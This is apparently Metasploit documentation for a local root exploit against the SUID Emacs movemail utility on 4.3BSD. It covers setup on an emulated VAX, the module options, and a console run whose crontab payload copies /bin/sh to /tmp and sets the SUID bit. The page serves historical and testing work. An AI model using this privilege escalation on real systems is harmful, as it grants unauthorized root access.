2020-02-06 15:01:58 -06:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
### Description
|
2018-11-22 17:28:04 -06:00
|
|
|
|
|
|
|
|
This module exploits a SUID installation of the Emacs `movemail` utility
|
|
|
|
|
to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.
|
2020-02-05 17:21:47 -06:00
|
|
|
|
2018-11-22 17:28:04 -06:00
|
|
|
The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
### Setup
|
2018-11-22 17:28:04 -06:00
|
|
|
|
|
|
|
|
A Docker environment for 4.3BSD on VAX is available at
|
|
|
|
|
<https://github.com/wvu/ye-olde-bsd>.
|
|
|
|
|
|
|
|
|
|
For manual setup, please follow the Computer History Wiki's
|
|
|
|
|
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
|
|
|
|
|
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
|
|
|
|
|
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
### Targets
|
2018-11-22 17:28:04 -06:00
|
|
|
|
|
|
|
|
```
|
|
|
|
|
Id Name
|
|
|
|
|
-- ----
|
|
|
|
|
0 /usr/lib/crontab.local
|
|
|
|
|
```
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
|
|
|
|
|
2018-11-22 17:28:04 -06:00
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
**MOVEMAIL**
|
|
|
|
|
|
|
|
|
|
Set this to the absolute path to the SUID-root `movemail` executable.
|
|
|
|
|
|
|
|
|
|
**CMD**
|
|
|
|
|
|
|
|
|
|
If your payload is `cmd/unix/generic` (suggested default), set this to
|
|
|
|
|
the command you want to run as root. The provided default will create a
|
|
|
|
|
SUID-root shell at `/tmp/sh`.
|
|
|
|
|
|
2020-02-06 15:01:58 -06:00
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
### 4.3BSD
|
2018-11-22 17:28:04 -06:00
|
|
|
|
|
|
|
|
```
|
2020-02-06 15:01:58 -06:00
|
|
|
msf5 > use exploit/unix/local/emacs_movemail
|
|
|
|
|
msf5 exploit(unix/local/emacs_movemail) > show missing
|
|
|
|
|
|
|
|
|
|
Module options (exploit/unix/local/emacs_movemail):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
SESSION yes The session to run this module on.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Payload options (cmd/unix/generic):
|
|
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
|
|
|
|
|
msf5 exploit(unix/local/emacs_movemail) > set session -1
|
|
|
|
|
session => -1
|
2018-11-22 17:28:04 -06:00
|
|
|
msf5 exploit(unix/local/emacs_movemail) > run
|
|
|
|
|
|
|
|
|
|
[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
|
2020-02-06 15:01:58 -06:00
|
|
|
[-] Current shell is unknown
|
2018-11-22 17:28:04 -06:00
|
|
|
[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
|
2020-02-06 15:01:58 -06:00
|
|
|
[+] SUID-root /etc/movemail found
|
2018-11-22 17:28:04 -06:00
|
|
|
[*] Preparing crontab with payload
|
|
|
|
|
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
|
|
|
|
|
* * * * * root rm -f /usr/lib/crontab.local
|
|
|
|
|
[*] Creating writable /usr/lib/crontab.local
|
|
|
|
|
[+] Writing crontab to /usr/lib/crontab.local
|
|
|
|
|
[!] Please wait at least one minute for effect
|
|
|
|
|
[*] Exploit completed, but no session was created.
|
2020-02-06 15:01:58 -06:00
|
|
|
msf5 exploit(unix/local/emacs_movemail) >
|
2018-11-22 17:28:04 -06:00
|
|
|
```
|
